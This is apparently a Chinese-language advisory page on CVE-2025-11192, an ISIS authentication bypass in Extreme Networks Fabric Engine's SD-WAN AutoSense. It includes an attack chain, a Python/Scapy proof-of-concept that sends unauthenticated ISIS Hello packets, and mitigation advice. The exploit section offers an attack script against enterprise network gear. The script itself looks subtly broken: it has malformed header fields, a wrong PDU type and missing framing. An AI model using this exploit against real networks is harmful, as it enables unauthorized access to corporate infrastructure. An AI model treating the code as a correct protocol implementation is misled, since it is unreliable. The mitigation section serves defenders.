CVE-2025-11192 Extreme Networks Fabric Engine SD-WAN AutoSense认证绕过漏洞

漏洞信息

漏洞编号

CVE-2025-11192

漏洞类型

认证绕过/未授权访问

CVSS评分

8.6 高危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Extreme Networks Fabric Engine (VOSS)

漏洞概述

CVE-2025-11192是Extreme Networks公司Fabric Engine（VOSS）网络操作系统中的一个高危安全漏洞，CVSS评分为8.6。该漏洞主要影响启用了SD-WAN AutoSense功能的网络端口。当SD-WAN AutoSense功能在端口上启用时，系统会自动配置Fabric连接，但在此过程中未对ISIS（Intermediate System to Intermediate System，中间系统到中间系统协议）认证设置进行有效验证。ISIS是网络设备之间用于交换路由信息的关键协议，通常用于大型企业网络和服务提供商网络中的Fabric架构。由于缺乏认证验证，恶意攻击者可以利用此漏洞绕过正常的安全控制机制，未经授权地访问网络Fabric和配置数据。

该漏洞的CVSS向量表明其具有网络攻击向量（AV:N）、低攻击复杂度（AC:L）、无需特权（PR:N）、无需用户交互（UI:N）的特点，并且影响范围已发生变化（S:C），对机密性产生高影响（C:H），但对完整性和可用性无直接影响。由于Fabric网络通常承载企业核心业务流量，该漏洞可能导致敏感网络拓扑信息、设备配置数据等机密信息泄露，对企业网络安全构成严重威胁。此漏洞已于2025年10月7日公开披露，影响VOSS 9.3之前的所有版本，Extreme Networks已发布安全公告建议用户尽快升级。

技术细节

该漏洞的核心技术问题在于Extreme Networks Fabric Engine（VOSS）的SD-WAN AutoSense功能实现中缺少对ISIS认证的有效验证机制。

**技术原理**：
1. SD-WAN AutoSense是VOSS中的一项自动化配置功能，设计初衷是为了简化Fabric网络的部署和管理。当该功能在网络端口上启用时，系统能够自动检测对端设备并配置Fabric连接参数。
2. ISIS协议是Fabric网络中的核心路由协议，负责设备间的路由信息交换和Fabric成员关系建立。在正常的Fabric架构中，ISIS应配置认证机制（如MD5或HMAC认证）以确保只有经过授权的设备才能加入Fabric。
3. 然而，SD-WAN AutoSense在自动化配置过程中，未对ISIS认证设置进行验证或强制执行。这意味着即使目标Fabric配置了严格的ISIS认证要求，AutoSense功能仍可能允许未通过认证的设备接入Fabric。

**利用方式**：
1. 攻击者首先需要物理或逻辑上连接到启用了SD-WAN AutoSense功能的端口。
2. 攻击者发送特制的ISIS协议数据包或利用AutoSense的自动配置机制，尝试建立Fabric邻接关系。
3. 由于缺少认证验证，攻击者的设备能够成功加入Fabric网络。
4. 一旦接入Fabric，攻击者可以被动嗅探Fabric内的路由信息和配置数据，获取网络拓扑、IP地址规划、VLAN配置等敏感信息。
5. 攻击者还可以利用Fabric成员身份进行进一步的横向移动或中间人攻击。

该漏洞的关键风险在于其完全绕过了ISIS认证这一核心安全机制，使得Fabric网络的安全边界形同虚设。

攻击链分析

STEP 1

步骤1：网络接入

攻击者通过物理接入或逻辑连接（如VPN、已入侵的内网主机）到达目标网络中启用了SD-WAN AutoSense功能的端口所在的网络段。

STEP 2

步骤2：协议探测

攻击者使用网络嗅探工具（如Wireshark、Scapy）监听目标端口的链路层流量，确认AutoSense功能是否启用，并分析ISIS协议的数据格式和时序。

STEP 3

步骤3：构造恶意ISIS报文

攻击者构造不包含认证信息（或使用伪造认证信息）的ISIS P2P Hello报文，伪装成合法的Fabric成员设备。

STEP 4

步骤4：触发AutoSense自动配置

攻击者将构造的ISIS报文发送到目标端口，触发SD-WAN AutoSense功能的自动配置流程。由于漏洞导致系统未验证ISIS认证设置，攻击者的设备被错误地接受为Fabric成员。

STEP 5

步骤5：建立Fabric邻接

攻击者的设备与目标Fabric交换机成功建立ISIS邻接关系，获得Fabric网络成员身份，能够参与路由信息交换。

STEP 6

步骤6：信息窃取

攻击者利用Fabric成员身份，监听和收集Fabric网络中的路由更新、配置数据、网络拓扑等敏感信息，泄露企业核心网络架构。

STEP 7

步骤7：横向扩展

基于获取的Fabric访问权限，攻击者可进一步实施中间人攻击、流量劫持或作为跳板攻击其他网络资源。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-11192 - Extreme Networks Fabric Engine (VOSS) SD-WAN AutoSense Authentication Bypass PoC
# This PoC demonstrates the concept of exploiting the missing ISIS authentication validation
# in SD-WAN AutoSense feature

#!/usr/bin/env python3
"""
CVE-2025-11192 PoC - SD-WAN AutoSense ISIS Authentication Bypass
Disclaimer: This PoC is for educational and authorized testing purposes only.
"""

from scapy.all import *
from scapy.layers.inet import IP, UDP
import time

class ISISPDU:
    """Craft ISIS Protocol Data Unit for Fabric Engine exploitation"""
    
    ISIS_HELLO = 0x0F  # ISIS Hello PDU type
    ISIS_P2P_HELLO = 0x10  # Point-to-Point ISIS Hello
    
    def __init__(self, system_id="1921.6800.0001"):
        self.system_id = system_id
        
    def craft_p2p_hello(self):
        """Craft a P2P ISIS Hello packet without authentication"""
        # ISIS Common Header
        isis_header = bytes([
            0x83,  # Protocol Discriminator (Network Layer Protocol ID)
            0x1B,  # Header Length
            0x01,  # Version/Protocol ID Extension
            0x00,  # ID Length (System ID length = 6 bytes)
            0x00,  # PDU Type (L1 Hello)
            0x01,  # Version
            0x00,  # Reserved
            0x00,  # Maximum Area Addresses
        ])
        
        # Source ID (attacker system ID)
        source_id = bytes([0x01, 0x92, 0x16, 0x80, 0x00, 0x01])
        
        # Holding Time
        holding_time = b'\x00\x0a'
        
        # PDU Length
        pdu_length = b'\x00\x15'
        
        # Circuit Type (Level 1)
        circuit_type = b'\x01'
        
        # System ID
        system_id_bytes = bytes([0x19, 0x21, 0x68, 0x00, 0x00, 0x01])
        
        # Hello Interval
        hello_interval = b'\x00\x0a'
        
        pdu = isis_header + source_id + holding_time + pdu_length + circuit_type + system_id_bytes + hello_interval
        
        return pdu
    
    def exploit_autosense(self, target_interface="eth0"):
        """Exploit SD-WAN AutoSense by sending crafted ISIS packets"""
        print(f"[*] CVE-2025-11192 - SD-WAN AutoSense Authentication Bypass PoC")
        print(f"[*] Target interface: {target_interface}")
        print(f"[*] Sending crafted ISIS P2P Hello without authentication...")
        
        pdu = self.craft_p2p_hello()
        
        # ISIS uses link-local multicast on Layer 2
        # All Level 1 ISs: 01:80:c2:00:00:14
        # All Level 2 ISs: 01:80:c2:00:00:15
        dst_mac = "01:80:c2:00:00:15"
        
        # Send the packet multiple times to ensure detection by AutoSense
        for i in range(5):
            packet = Ether(dst=dst_mac) / Raw(load=pdu)
            sendp(packet, iface=target_interface, verbose=False)
            print(f"[+] Packet {i+1} sent successfully")
            time.sleep(1)
        
        print(f"[*] Exploit completed. Check if Fabric adjacency was established.")
        print(f"[*] If successful, unauthorized access to Fabric network is achieved.")

if __name__ == "__main__":
    import sys
    iface = sys.argv[1] if len(sys.argv) > 1 else "eth0"
    exploit = ISISPDU()
    exploit.exploit_autosense(iface)

影响范围

Extreme Networks Fabric Engine (VOSS) < 9.3

防御指南

临时缓解措施

在等待官方补丁或无法立即升级的情况下，建议采取以下临时缓解措施：1）立即禁用所有网络端口上的SD-WAN AutoSense功能，手动配置Fabric连接参数；2）为所有Fabric端口配置强ISIS认证机制（推荐使用HMAC-SHA256），确保所有ISIS协议交互都经过认证验证；3）部署网络访问控制（NAC）策略，严格限制能够接入Fabric端口的设备；4）启用端口安全功能，设置每个端口的最大MAC地址数为1；5）加强网络监控，部署针对ISIS协议的异常流量检测规则，及时发现可疑的Fabric接入尝试；6）对所有Fabric成员进行定期审计，确保只有授权设备在Fabric网络中。